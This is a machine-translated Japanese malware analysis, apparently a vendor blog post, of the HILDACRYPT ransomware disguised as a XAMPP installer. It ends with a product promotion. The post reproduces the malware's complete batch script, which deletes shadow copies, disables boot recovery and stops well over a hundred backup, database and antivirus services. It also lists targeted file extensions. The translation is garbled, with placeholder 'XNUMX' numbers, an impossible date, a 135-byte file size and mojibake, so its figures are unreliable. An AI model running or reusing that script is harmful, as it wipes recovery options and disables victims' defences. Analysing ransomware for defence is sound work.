HILDACRYPT: 新たなランサムウェアがバックアップ システムとウイルス対策ソリューションを襲う

こんにちは、ハブル! もう一度、ランサムウェア カテゴリのマルウェアの最新バージョンについて話します。 HILDACRYPT は、2019 年 XNUMX 月に発見された Hilda ファミリーの一員である新しいランサムウェアで、ソフトウェアの配布に使用された Netflix のアニメにちなんで名付けられました。 今日は、この最新のランサムウェア ウイルスの技術的特徴について説明します。

HILDACRYPT: 新たなランサムウェアがバックアップ システムとウイルス対策ソリューションを襲う

Hilda ランサムウェアの最初のバージョンでは、Youtube に投稿されたランサムウェアへのリンクが含まれていました。 トレーラー 身代金の手紙には漫画シリーズが含まれていた。 HILDACRYPT は、MariaDB、PHP、および Perl を含むインストールが簡単な Apache ディストリビューションである正規の XAMPP インストーラーを装います。 同時に、cryptolocker には別のファイル名 (xamp) が付けられます。 さらに、ランサムウェア ファイルには電子署名がありません。

静的解析

このランサムウェアは、MS Windows 用に作成された PE32 .NET ファイルに含まれています。 サイズは 135 バイトです。 メイン プログラム コードとディフェンダー プログラム コードは両方とも C# で書かれています。 コンパイル日時スタンプによると、バイナリは 168 年 14 月 2019 日に作成されました。

HILDACRYPT: 新たなランサムウェアがバックアップ システムとウイルス対策ソリューションを襲う

Detect It Easy によると、ランサムウェアは Confuser と ConfuserEx を使用してアーカイブされますが、これらの難読化ツールは以前と同じで、ConfuserEx のみが Confuser の後継であるため、コード署名が似ています。

HILDACRYPT: 新たなランサムウェアがバックアップ システムとウイルス対策ソリューションを襲う

HILDACRYPT は確かに ConfuserEx にパッケージ化されています。

HILDACRYPT: 新たなランサムウェアがバックアップ システムとウイルス対策ソリューションを襲う

SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

攻撃ベクトル

おそらく、ランサムウェアは Web プログラミング サイトの XNUMX つで発見され、正規の XAMPP プログラムを装いました。

感染の連鎖全体は次のとおりです。 app.any.run サンドボックス.

難読化

ランサムウェア文字列は暗号化された形式で保存されます。 HILDACRYPT は起動されると、Base64 と AES-256-CBC を使用して暗号化を復号します。

HILDACRYPT: 新たなランサムウェアがバックアップ システムとウイルス対策ソリューションを襲う

インストール

まず、ランサムウェアは %AppDataRoaming% に GUID (Globally Unique Identifier) パラメーターがランダムに生成されるフォルダーを作成します。 この場所にバット ファイルを追加すると、ランサムウェア ウイルスは cmd.exe を使用してファイルを起動します。

cmd.exe /c JKfgkgj3hjgfhjka.bat & 終了

HILDACRYPT: 新たなランサムウェアがバックアップ システムとウイルス対策ソリューションを襲うHILDACRYPT: 新たなランサムウェアがバックアップ システムとウイルス対策ソリューションを襲う
次に、システム機能またはサービスを無効にするバッチ スクリプトの実行を開始します。

HILDACRYPT: 新たなランサムウェアがバックアップ システムとウイルス対策ソリューションを襲う

このスクリプトには、シャドウ コピーを破棄し、SQL サーバー、バックアップ、およびウイルス対策ソリューションを無効にするコマンドの長いリストが含まれています。

たとえば、Acronis Backup サービスを停止しようとすると失敗します。 さらに、Veeam、Sophos、Kaspersky、McAfee などのベンダーのバックアップ システムやウイルス対策ソリューションも攻撃します。

@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0

上記のサービスとプロセスが無効になると、cryptolocker は tasklist コマンドを使用して実行中のすべてのプロセスに関する情報を収集し、必要なサービスがすべて停止していることを確認します。
タスクリストv/fo csv

このコマンドは、実行中のプロセスの詳細なリストを表示します。その要素は「,」記号で区切られています。
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»

HILDACRYPT: 新たなランサムウェアがバックアップ システムとウイルス対策ソリューションを襲う

このチェックの後、ランサムウェアは暗号化プロセスを開始します。

Шифрование

ファイル暗号化

HILDACRYPT は、Recycle.Bin フォルダーと Reference AssembliesMicrosoft フォルダーを除く、ハード ドライブで見つかったすべての内容を調べます。 後者には、ランサムウェアの動作に影響を与える可能性がある .Net アプリケーションの重要な DLL、PDB などのファイルが含まれています。 暗号化されるファイルを検索するには、次の拡張子のリストが使用されます。

«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»

このランサムウェアは、AES-256-CBC アルゴリズムを使用してユーザー ファイルを暗号化します。 キーのサイズは 256 ビット、初期化ベクトル (IV) のサイズは 16 バイトです。

HILDACRYPT: 新たなランサムウェアがバックアップ システムとウイルス対策ソリューションを襲う

次のスクリーンショットでは、byte_2 と byte_1 の値が GetBytes() を使用してランダムに取得されました。

HILDACRYPT: 新たなランサムウェアがバックアップ システムとウイルス対策ソリューションを襲う

キー

HILDACRYPT: 新たなランサムウェアがバックアップ システムとウイルス対策ソリューションを襲う

ANDで

HILDACRYPT: 新たなランサムウェアがバックアップ システムとウイルス対策ソリューションを襲う

暗号化されたファイルの拡張子は HCY!. です。これは暗号化されたファイルの例です。 前述のキーと IV は、このファイル用に作成されました。

HILDACRYPT: 新たなランサムウェアがバックアップ システムとウイルス対策ソリューションを襲う

キーの暗号化

cryptolocker は、生成された AES キーを暗号化されたファイルに保存します。 暗号化されたファイルの最初の部分には、HILDACRYPT、KEY、IV、FileLen などのデータを XML 形式で含むヘッダーがあり、次のようになります。

HILDACRYPT: 新たなランサムウェアがバックアップ システムとウイルス対策ソリューションを襲う

AES および IV キーの暗号化は RSA-2048 を使用して行われ、エンコードは Base64 を使用して行われます。 RSA 公開キーは、XML 形式の暗号化された文字列の XNUMX つで cryptolocker の本体に保存されます。

28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB

RSA 公開キーは、AES ファイル キーの暗号化に使用されます。 RSA 公開キーは Base64 でエンコードされ、65537 の法と公開指数で構成されます。復号化には、攻撃者が所有する RSA 秘密キーが必要です。

RSA 暗号化の後、AES キーは Base64 を使用してエンコードされ、暗号化されたファイルに保存されます。

身代金メッセージ

暗号化が完了すると、HILDACRYPT はファイルを暗号化したフォルダーに html ファイルを書き込みます。 ランサムウェア通知には、被害者が攻撃者に連絡できる XNUMX つの電子メール アドレスが含まれています。

HILDACRYPT: 新たなランサムウェアがバックアップ システムとウイルス対策ソリューションを襲う

恐喝の通知には、「ロリは安全ではありません;)」という一文も含まれており、これは日本で禁止されている少女の姿をしたアニメや漫画のキャラクターに言及したものだ。

出力

新しいランサムウェア ファミリである HILDACRYPT が新しいバージョンをリリースしました。 暗号化モデルにより、被害者はランサムウェアによって暗号化されたファイルを復号化できなくなります。 Cryptolocker はアクティブな保護方法を使用して、バックアップ システムやウイルス対策ソリューションに関連する保護サービスを無効にします。 HILDACRYPT の作者は、Netflix で放映されているアニメ シリーズ「ヒルダ」のファンであり、その予告編へのリンクは、プログラムの前のバージョンの購入通知に含まれていました。

通常は、 アクロニスバックアップ и Acronis True Image HILDACRYPT ランサムウェアからコンピュータを保護でき、プロバイダーは次の方法で顧客を保護できます。 アクロニスバックアップクラウド。 これらのソリューションには以下の機能が含まれているため、保護が保証されます。 サイバーセキュリティ バックアップだけでなく、統合セキュリティシステムも含まれます アクロニス アクティブ プロテクション - 機械学習モデルを活用し、行動ヒューリスティックに基づいた、他に類を見ないゼロデイ ランサムウェアの脅威に対抗できるテクノロジーです。

侵入の痕跡

拡張子HCY!
HILDACRYPTReadMe.html
xamp.exe には XNUMX 文字の「p」が含まれ、デジタル署名はありません
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

出所: habr.com

コメントを追加します